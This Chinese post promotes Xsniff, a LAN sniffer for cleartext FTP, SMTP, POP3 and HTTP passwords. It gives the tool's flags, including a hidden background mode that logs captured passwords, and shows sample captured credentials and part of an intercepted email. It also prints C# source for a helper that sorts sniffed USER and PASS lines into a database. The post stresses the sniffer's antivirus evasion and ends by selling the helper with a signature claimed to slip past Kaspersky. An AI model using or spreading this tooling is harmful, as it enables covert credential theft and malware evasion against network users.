经过测试，Xsniff 可以在 Windows XP、Windows 2000 和 Windows 2003 下运行，可以抓取局域网内的密码（FTP 和 POP3）；HTTP 的规则没有配置，只能抓取常见的明文协议。它不需要安装 WinPcap 组件，而且免杀效果较好；其源码目前仍在寻找中。
简易的命令行方式嗅探器，可捕获局域网内以明文传输的 FTP/SMTP/POP3/HTTP 协议密码（经 TLS 加密的会话无法由被动嗅探还原）。
运行参数说明:
xsniff <选项>
<选项>含义如下:
-tcp : 输出TCP数据报
-udp : 输出UDP数据报
-icmp : 输出ICMP数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr <IP地址> : 过滤IP地址
-port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件
-asc : 以ASCII形式输出
-hex : 以16进制形式输出
示例:xsniff.exe -pass -hide -log pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
------------------------------------------------------------------------------------------
嗅探结果:
TCP [08/10/11 10:27:48]
202.243.15.102->172.168.8.9 Port: 1233->110
USER admin
TCP [08/10/11 10:27:48]
202.243.15.102->172.168.8.9 Port: 1233->110
PASS #$@wer123
TCP [08/10/11 10:28:20]
202.16.8.9->172.168.10.2 Port: 23965->25
RCPT TO:11111@126.com
TCP [08/10/11 10:28:22]
202.16.8.9->172.168.10.2 Port: 23965->25
MAIL FROM:YYYY@163.com
TCP [08/10/11 18:29:00]
202.16.8.9->172.168.10.2 Port: 30955->80
HOST: "
Content-Transfer-Encoding: quoted-printable
E ve tre the? BR..=20
-----Original Message-----
From: XXXX, XXX XXX \(XXXX\\Operations\)
Sent: 10/08/2011, 18:13=20
To: YYY, YYY YYYY Y \(XXXX\\Operations\)
Subject: FW: 2011 Taxation=20
------------------------------------------------------------------------------------------
xsniff.exe 的嗅探结果一旦超过几 MB，内容就太多，人工处理几乎不可能完成，为此写了一个 XsniffHelp 工具：它去除重复行，并丢弃非用户名/密码的嗅探记录（只保留第三行以 USER 或 PASS 开头的 TCP 记录，分别导入 User_tb 和 Pass_tb 表）。经测试，一个 8 MB 的嗅探结果处理后只有 1 MB 多一点，耗时大约 6 分钟，效果还不错。需要注意的是，导入后的数据库中用户名和密码都是明文存储，而且导入出错时弹出的对话框会原样显示出错的那一行（可能是 PASS 行），因此嗅探日志和导入后的数据库都应按敏感数据处理，用后及时清理。
注意：此工具使用 .NET 开发，运行需要安装 .NET 运行环境；导入功能还依赖代码中 DBConStr 所指向的 OleDb 数据库连接可用。
string ConnStr = DBConStr;
OleDbConnection conn = new OleDbConnection(ConnStr);
string sqlUserStr = string.Empty;
string sqlPassStr = string.Empty;
int iCount = 0;
if (string.IsNullOrEmpty(strFilePath))
{
return;
}
else
{
try
{
sqlUserStr = "insert into User_tb (X_TCP,X_IP,X_Port,X_USER) values (@xTCP,@xIP,@xPort,@xUSER)";
sqlPassStr = "insert into Pass_tb (X_TCP,X_IP,X_Port,X_PASS) values (@xTCP,@xIP,@xPort,@xPASS)";
fs = new FileStream(strFilePath, FileMode.Open);
srReader = new StreamReader(fs);
string[] sLinkArray1 = null;
string[] sLinkArray2 = null;
string[] sLinkArray3 = null;
string strLine1 = ""; //TCP [08/10/11 10:27:48]
string strLine2 = ""; //171.243.15.102->172.16.8.9 Port: 1233->110
string strLine3 = ""; //USER|PASS|其它
string strLine4 = ""; //空行
int tag = 0;
while (srReader.Peek() != -1)
{
//读取一行文本
tag++;
switch (tag)
{
case 1:
strLine1 = srReader.ReadLine().Trim();
if (!strLine1.StartsWith("TCP"))
{
tag = tag - 1;
}
break;
case 2:
strLine2 = srReader.ReadLine().Trim();
break;
case 3:
strLine3 = srReader.ReadLine().Trim();
break;
case 4:
strLine4 = srReader.ReadLine().Trim();
break;
default:
break;
}
if (strLine1 != "" && strLine2 != "" && strLine3 != "" && ((tag == 4) || (tag == 3 && srReader.Peek() == -1)))
{
if (strLine3.StartsWith("USER"))
{
sLinkArray1 = strLine1.Split('[');
sLinkArray2 = strLine2.Split('-');
sLinkArray3 = strLine3.Split(' ');
OleDbCommand olecmd = new OleDbCommand(sqlUserStr, conn);
olecmd.CommandType = CommandType.Text;
olecmd.Parameters.AddWithValue("@xTCP", sLinkArray1[1].ToString().Substring(0, sLinkArray1[1].Length-2));
olecmd.Parameters.AddWithValue("@xIP", sLinkArray2[0].ToString());
olecmd.Parameters.AddWithValue("@xPort", sLinkArray2[2].ToString().Substring(1, sLinkArray2[2].Length - 1));
if (sLinkArray3.Length == 2 && sLinkArray3[1].Trim() != "" && sLinkArray3[1].Trim() != null)
{
olecmd.Parameters.AddWithValue("@xUSER", sLinkArray3[1].ToString());
}
else
{
olecmd.Parameters.AddWithValue("@xUSER", "UUUUUUUUUUUUUUUUUUUUU");
}
try
{
conn.Open();
int i = olecmd.ExecuteNonQuery();
conn.Close();
iCount++;
}
catch (Exception excep)
{
conn.Close();
MessageBox.Show(excep.Message + "strLine3:" + strLine3);
}
}
if (strLine3.StartsWith("PASS"))
{
sLinkArray1 = strLine1.Split('[');
sLinkArray2 = strLine2.Split('-');
sLinkArray3 = strLine3.Split(' ');
OleDbCommand olecmd = new OleDbCommand(sqlPassStr, conn);
olecmd.CommandType = CommandType.Text;
olecmd.Parameters.AddWithValue("@xTCP", sLinkArray1[1].ToString().Substring(0, sLinkArray1[1].Length - 2));
olecmd.Parameters.AddWithValue("@xIP", sLinkArray2[0].ToString());
olecmd.Parameters.AddWithValue("@xPort", sLinkArray2[2].ToString().Substring(1, sLinkArray2[2].Length - 1));
if (sLinkArray3.Length == 2 && sLinkArray3[1].Trim() != "" && sLinkArray3[1].Trim() != null)
{
olecmd.Parameters.AddWithValue("@xPASS", sLinkArray3[1].ToString());
}
else
{
olecmd.Parameters.AddWithValue("@xPASS", "PPPPPPPPPPPPPPPPPPPP");
}
try
{
conn.Open();
int i = olecmd.ExecuteNonQuery();
conn.Close();
iCount++;
}
catch (Exception excep)
{
conn.Close();
MessageBox.Show(excep.Message + "strLine3:" + strLine3);
}
}
tag = 0;
}
}
srReader.Close();
MessageBox.Show("成功导入" + iCount + "条数据!", "提示");
}
catch (Exception excep)
{
MessageBox.Show(excep.Message);
}
finally
{
srReader.Close();
fs.Close();
}
}
strFilePath = string.Empty;
LoadDataGridView();
-------------------------------------------------------------------------------------------
如有需要淘宝网店拍下XsniffHelp,拍下即送免杀卡巴斯基的数字签名。